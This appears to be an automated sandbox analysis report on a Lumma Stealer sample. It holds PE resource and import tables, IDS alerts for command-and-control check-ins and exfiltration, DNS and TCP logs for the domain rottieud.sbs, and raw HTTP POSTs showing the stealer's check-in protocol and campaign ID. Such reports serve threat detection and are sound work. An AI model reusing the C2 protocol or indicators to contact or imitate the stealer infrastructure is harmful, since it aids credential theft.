                                                                          .rsrc0x11500000xffb70x1000083eeb58e31bb1020c8b95e307afebbe1False0.8391876220703125data7.487262228849337IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x11502540x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.7446808510638298
                                                                          RT_ICON0x11506bc0x1128Device independent bitmap graphic, 32 x 64 x 32, image size 43520.5295992714025501
                                                                          RT_ICON0x11517e40x2668Device independent bitmap graphic, 48 x 96 x 32, image size 97920.42005695687550854
                                                                          RT_ICON0x1153e4c0xb921PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9754394108834638
                                                                          RT_GROUP_ICON0x115f7700x3edata0.8064516129032258
                                                                          RT_VERSION0x115f7b00x408dataEnglishUnited States0.4699612403100775
                                                                          RT_MANIFEST0x115fbb80x3ffXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.43010752688172044
                                                                          DLLImport
                                                                          kernel32.dllWriteFile, WriteConsoleW, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetThreadPriority, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, PostQueuedCompletionStatus, LoadLibraryA, LoadLibraryW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetEnvironmentStringsW, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateWaitableTimerA, CreateThread, CreateIoCompletionPort, CreateFileA, CreateEventA, CloseHandle, AddVectoredExceptionHandler
                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-11-10T09:27:19.114331+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449730TCP
                                                                          2024-11-10T09:27:20.119008+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.73.211443TCP
                                                                          2024-11-10T09:27:20.798754+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449734104.21.73.211443TCP
                                                                          2024-11-10T09:27:20.798754+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449734104.21.73.211443TCP
                                                                          2024-11-10T09:27:21.493404+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.73.211443TCP
                                                                          2024-11-10T09:27:21.995787+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449736104.21.73.211443TCP
                                                                          2024-11-10T09:27:21.995787+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736104.21.73.211443TCP
                                                                          2024-11-10T09:27:22.855660+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.462520104.21.73.211443TCP
                                                                          2024-11-10T09:27:24.216426+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.462521104.21.73.211443TCP
                                                                          2024-11-10T09:27:25.592113+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.462522104.21.73.211443TCP
                                                                          2024-11-10T09:27:27.143991+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.462523104.21.73.211443TCP
                                                                          2024-11-10T09:27:27.877172+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.462523104.21.73.211443TCP
                                                                          2024-11-10T09:27:28.980255+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.462524104.21.73.211443TCP
                                                                          2024-11-10T09:27:31.429815+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.462525104.21.73.211443TCP
                                                                          2024-11-10T09:27:59.304154+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.462527TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 10, 2024 09:27:19.506735086 CET49734443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:19.506767035 CET44349734104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:19.506841898 CET49734443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:19.509721994 CET49734443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:19.509736061 CET44349734104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:20.118889093 CET44349734104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:20.119008064 CET49734443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:20.164541960 CET49734443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:20.164560080 CET44349734104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:20.164927006 CET44349734104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:20.211431980 CET49734443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:20.326740980 CET49734443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:20.326961994 CET49734443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:20.327013969 CET44349734104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:20.798811913 CET44349734104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:20.798965931 CET44349734104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:20.799010992 CET49734443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:20.800718069 CET49734443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:20.800743103 CET44349734104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:20.800890923 CET49734443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:20.800895929 CET44349734104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:20.882249117 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:20.882297993 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:20.882651091 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:20.885618925 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:20.885636091 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.493308067 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.493403912 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:21.494692087 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:21.494704008 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.494946957 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.496248007 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:21.496248007 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:21.496356010 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.995628119 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.995687962 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.995886087 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.995892048 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:21.995902061 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.995922089 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.995951891 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.995958090 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:21.995970011 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.996078014 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.996085882 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:21.996090889 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.996129036 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:21.996134043 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:21.996179104 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.112626076 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.112731934 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.112762928 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.112802982 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.112828970 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.112857103 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.112873077 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.112925053 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.112932920 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.112946033 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.113007069 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.113225937 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.113243103 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.113358021 CET49736443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.113363981 CET44349736104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.226955891 CET62520443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.227001905 CET44362520104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.227066994 CET62520443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.227382898 CET62520443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.227395058 CET44362520104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.855571032 CET44362520104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.855659962 CET62520443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.871037960 CET62520443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.871057987 CET44362520104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.871337891 CET44362520104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.895006895 CET62520443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.895136118 CET62520443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.895153999 CET44362520104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:22.895211935 CET62520443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:22.895220041 CET44362520104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:23.515968084 CET44362520104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:23.516076088 CET44362520104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:23.516122103 CET62520443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:23.516264915 CET62520443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:23.516288042 CET44362520104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:23.609741926 CET62521443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:23.609802961 CET44362521104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:23.609901905 CET62521443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:23.610233068 CET62521443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:23.610244989 CET44362521104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:24.216295958 CET44362521104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:24.216425896 CET62521443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:24.217765093 CET62521443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:24.217775106 CET44362521104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:24.218003035 CET44362521104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:24.225662947 CET62521443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:24.225796938 CET62521443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:24.225828886 CET44362521104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:24.740210056 CET44362521104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:24.740314007 CET44362521104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:24.740497112 CET62521443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:24.740808010 CET62521443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:24.740824938 CET44362521104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:24.961523056 CET62522443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:24.961561918 CET44362522104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:24.961749077 CET62522443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:24.961961031 CET62522443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:24.961977005 CET44362522104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:25.591945887 CET44362522104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:25.592113018 CET62522443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:25.593322992 CET62522443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:25.593343973 CET44362522104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:25.593588114 CET44362522104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:25.594820976 CET62522443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:25.594974041 CET62522443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:25.595014095 CET44362522104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:25.595063925 CET62522443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:25.595077991 CET44362522104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:26.156002045 CET44362522104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:26.156111956 CET44362522104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:26.156311035 CET62522443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:26.156806946 CET62522443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:26.156825066 CET44362522104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:26.544266939 CET62523443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:26.544322014 CET44362523104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:26.544414043 CET62523443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:26.544744968 CET62523443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:26.544761896 CET44362523104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:27.143836021 CET44362523104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:27.143990993 CET62523443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:27.145203114 CET62523443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:27.145217896 CET44362523104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:27.145452976 CET44362523104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:27.149569988 CET62523443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:27.149647951 CET62523443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:27.149652958 CET44362523104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:27.877187014 CET44362523104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:27.877279043 CET44362523104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:27.877477884 CET62523443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:27.877631903 CET62523443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.372750044 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.372793913 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.372884035 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.373186111 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.373198032 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.980118990 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.980254889 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.981656075 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.981664896 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.981903076 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.983134985 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.983913898 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.983948946 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.984046936 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.984086037 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.984194040 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.984215021 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.984344006 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.984371901 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.984518051 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.984545946 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.984693050 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.984726906 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.984740019 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.984890938 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.984925985 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.994240046 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.994393110 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.994417906 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.994440079 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.994457006 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.994457006 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.994481087 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.994573116 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.994606018 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.994640112 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.999098063 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:28.999174118 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:28.999186039 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:30.774921894 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:30.775038958 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:30.775096893 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:30.775295973 CET62524443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:30.775307894 CET44362524104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:30.808507919 CET62525443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:30.808558941 CET44362525104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:30.808618069 CET62525443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:30.808912039 CET62525443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:30.808928013 CET44362525104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:31.429744005 CET44362525104.21.73.211192.168.2.4
                                                                          Nov 10, 2024 09:27:31.429815054 CET62525443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:31.429836988 CET62525443192.168.2.4104.21.73.211
                                                                          Nov 10, 2024 09:27:31.430027008 CET62525443192.168.2.4104.21.73.211
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Nov 10, 2024 09:27:19.458338976 CET5790553192.168.2.41.1.1.1
                                                                          Nov 10, 2024 09:27:19.499681950 CET53579051.1.1.1192.168.2.4
                                                                          Nov 10, 2024 09:27:21.343269110 CET53632291.1.1.1192.168.2.4
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Nov 10, 2024 09:27:19.458338976 CET192.168.2.41.1.1.10x9b36Standard query (0)rottieud.sbsA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Nov 10, 2024 09:27:19.499681950 CET1.1.1.1192.168.2.40x9b36No error (0)rottieud.sbs104.21.73.211A (IP address)IN (0x0001)false
                                                                          Nov 10, 2024 09:27:19.499681950 CET1.1.1.1192.168.2.40x9b36No error (0)rottieud.sbs172.67.192.43A (IP address)IN (0x0001)false
                                                                          • rottieud.sbs
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.449734104.21.73.2114437812C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-11-10 08:27:20 UTC259OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 8
                                                                          Host: rottieud.sbs
                                                                          2024-11-10 08:27:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                          Data Ascii: act=life
                                                                          2024-11-10 08:27:20 UTC1009INHTTP/1.1 200 OK
                                                                          Date: Sun, 10 Nov 2024 08:27:20 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=gimaj8dqliuujn9jfp5g9hsenb; expires=Thu, 06-Mar-2025 02:13:59 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8%2BLNzHCQ5hdrOP0eMdoIrvkAtJ8ziIT7IUp33COyVhX9dEoV6U6rx%2BgKIULMNiF6V8FX9K9WUZt7mAAZWKoFs%2F5SnZTEOFdZhtzRC9LhHDa56LBtlQm1Z%2Fq9CSD1%2F6w%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8e04a9ac6ecd46cb-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1240&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=903&delivery_rate=2364081&cwnd=251&unsent_bytes=0&cid=e9804a55e9c07247&ts=690&x=0"
                                                                          2024-11-10 08:27:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                          Data Ascii: 2ok
                                                                          2024-11-10 08:27:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.449736104.21.73.2114437812C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-11-10 08:27:21 UTC260OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 47
                                                                          Host: rottieud.sbs
                                                                          2024-11-10 08:27:21 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 65 53 61 78 41 75 2d 2d 77 65 62 65 78 26 6a 3d
                                                                          Data Ascii: act=recive_message&ver=4.0&lid=eSaxAu--webex&j=
                                                                          2024-11-10 08:27:21 UTC1003INHTTP/1.1 200 OK
                                                                          Date: Sun, 10 Nov 2024 08:27:21 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=p6or4dmoslus27hdvvrtluv8qa; expires=Thu, 06-Mar-2025 02:14:00 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZgLHeak249TMRnDWIX8jqKyCRkaExLnZs0teVWlrYVMCRdPB1BzLvH53LvDlDTKCik8VOIu0WsiMI%2BDlvWiTeMq7IxRWD9uJ5q0%2BzBBz7dguwPMVtYpqMJ78nx2fTk%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8e04a9b3be4a2e75-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1577&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=943&delivery_rate=1714624&cwnd=245&unsent_bytes=0&cid=15d2c180689f6a9c&ts=509&x=0"
                                                                          2024-11-10 08:27:21 UTC366INData Raw: 31 64 37 36 0d 0a 44 4e 66 77 73 72 39 44 71 75 55 58 62 66 76 47 6f 49 61 45 2f 57 7a 2f 31 39 45 67 64 50 61 6b 71 6d 44 43 5a 44 6c 35 37 55 78 33 39 59 61 51 68 58 65 47 78 32 51 49 32 66 7a 55 39 50 47 59 51 4e 32 32 74 51 4a 4f 6b 4d 58 47 45 36 64 49 47 77 2b 41 62 6a 61 78 6b 64 37 4d 4a 6f 62 48 63 68 58 5a 2f 50 76 39 70 70 67 43 33 65 33 7a 52 52 36 55 78 63 59 43 6f 77 39 57 43 59 45 76 5a 4c 75 58 32 74 6f 67 7a 6f 52 37 41 4a 36 6a 78 65 66 75 6b 77 57 53 76 37 77 43 57 4e 54 42 30 45 4c 34 52 6e 51 63 6d 53 31 42 74 6f 50 5a 6e 54 36 47 6e 6a 55 49 6c 65 53 61 70 4f 57 59 44 70 4f 78 74 55 73 63 6e 73 7a 4f 41 36 59 4f 53 52 43 4c 4a 47 53 31 6c 4e 76 51 4b 64 71 4a 63 51 65 56 70 63 2f 6e 70 74 46 4f 6d 71 33 7a 47 6c 62 48 39 4d 73 54 73
                                                                          Data Ascii: 1d76DNfwsr9DquUXbfvGoIaE/Wz/19EgdPakqmDCZDl57Ux39YaQhXeGx2QI2fzU9PGYQN22tQJOkMXGE6dIGw+Abjaxkd7MJobHchXZ/Pv9ppgC3e3zRR6UxcYCow9WCYEvZLuX2togzoR7AJ6jxefukwWSv7wCWNTB0EL4RnQcmS1BtoPZnT6GnjUIleSapOWYDpOxtUscnszOA6YOSRCLJGS1lNvQKdqJcQeVpc/nptFOmq3zGlbH9MsTs
